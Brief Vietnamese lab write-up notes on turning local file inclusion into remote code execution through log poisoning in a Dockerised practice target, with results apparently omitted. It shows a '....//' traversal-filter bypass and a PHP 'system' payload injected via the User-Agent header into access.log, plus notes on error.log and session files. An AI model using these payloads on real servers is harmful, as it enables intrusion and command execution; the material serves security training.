git clone https://github.com/caodchuong312/lfi-to-rce-via-log.git
cd lfi-to-rce-via-log/
sudo docker-compose up
=> access: http://localhost:1337
như vậy ../ bị replace, bypass: ....//.
test file access.log:
inject <?php system('id'); ?> vào User-Agent:
kết quả:
giờ tìm và đọc flag:
tương tự với
error.log
kiểm tra và truy cập file session:
check file session:
oke